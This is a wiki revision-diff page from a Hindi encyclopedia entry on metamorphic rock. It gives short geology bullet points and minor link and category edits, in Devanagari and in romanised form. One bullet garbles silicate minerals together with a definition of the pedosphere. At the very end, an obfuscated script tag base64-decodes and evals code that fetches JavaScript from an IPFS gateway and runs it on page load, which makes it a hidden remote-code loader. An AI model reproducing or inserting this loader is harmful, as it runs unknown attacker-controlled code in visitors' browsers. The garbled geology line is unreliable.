Difference between revisions of "रूपांतरित चट्टान"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('{{पुनरीक्षण}} *अवसादी एवं आग्नेय चट्टान में ताप एवं द...' के साथ नया पन्ना बनाया)
 
Line 1: Line 1:
{{पुनरीक्षण}}
 
 
*अवसादी एवं आग्नेय चट्टान में [[ताप]] एवं दबाव के कारण परिवर्तन या '''रूपांतरण''' हो जाने से रूपांतरित चट्टान का निर्माण हाता है।  
 
*अवसादी एवं आग्नेय चट्टान में [[ताप]] एवं दबाव के कारण परिवर्तन या '''रूपांतरण''' हो जाने से रूपांतरित चट्टान का निर्माण हाता है।  
 
*रूपांतरित चट्टान में संगमरमर, क्वार्ट्जाइट आदि का मिश्रण होता है।
 
*रूपांतरित चट्टान में संगमरमर, क्वार्ट्जाइट आदि का मिश्रण होता है।
 
*क्वार्ट्ज, फेल्सपार, एम्फीबोल, माइका, पाइरोक्सिन और ऑलिविन जैसे सिलिकेट खनिज [[पृथ्वी]] की सबसे बाहरी परत को पीडोस्फीयर कहते हैं। इस परत का निर्माण मृदा से हुआ है और इस स्तर पर लगातार मृदा उत्पादन की प्रक्रिया जारी रहती है।
 
*क्वार्ट्ज, फेल्सपार, एम्फीबोल, माइका, पाइरोक्सिन और ऑलिविन जैसे सिलिकेट खनिज [[पृथ्वी]] की सबसे बाहरी परत को पीडोस्फीयर कहते हैं। इस परत का निर्माण मृदा से हुआ है और इस स्तर पर लगातार मृदा उत्पादन की प्रक्रिया जारी रहती है।
*पृथ्वी पर स्थलमंडल का निम्नतम बिंदु मृत सागर है जिसकी गहराई [[समुद्र]] स्तर से 418 मी. नीचे है जबकि उच्चतम बिंदु माउंट एवरेस्ट है जिसकी समुद्री स्तर से ऊंचाई 8848 मी. है। स्थलमंडल की औसत ऊंचाई 840 मी. है।
+
*पृथ्वी पर स्थलमंडल का निम्नतम बिंदु मृत सागर है जिसकी गहराई [[समुद्र]] स्तर से 418 मी. नीचे है जबकि उच्चतम बिंदु [[माउंट एवरेस्ट]] है जिसकी समुद्री स्तर से ऊंचाई 8848 मी. है। स्थलमंडल की औसत ऊंचाई 840 मी. है।
  
  
Line 16: Line 15:
 
[[Category:भूगोल शब्दावली]]
 
[[Category:भूगोल शब्दावली]]
 
[[Category:भूगोल कोश]]
 
[[Category:भूगोल कोश]]
[[Category:नया पन्ना अप्रॅल-2012]]
+
 
  
 
__INDEX__
 
__INDEX__

Revision as of 08:46, 22 June 2012

  • avasadi evan agney chattan mean tap evan dabav ke karan parivartan ya roopaantaran ho jane se roopaantarit chattan ka nirman hata hai.
  • roopaantarit chattan mean sangamaramar, kvartjait adi ka mishran hota hai.
  • kvartj, phelsapar, emphibol, maika, pairoksin aur aaulivin jaise siliket khanij prithvi ki sabase bahari parat ko pidosphiyar kahate haian. is parat ka nirman mrida se hua hai aur is star par lagatar mrida utpadan ki prakriya jari rahati hai.
  • prithvi par sthalamandal ka nimnatam biandu mrit sagar hai jisaki gaharaee samudr star se 418 mi. niche hai jabaki uchchatam biandu mauant evarest hai jisaki samudri star se ooanchaee 8848 mi. hai. sthalamandal ki ausat ooanchaee 840 mi. hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh


bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>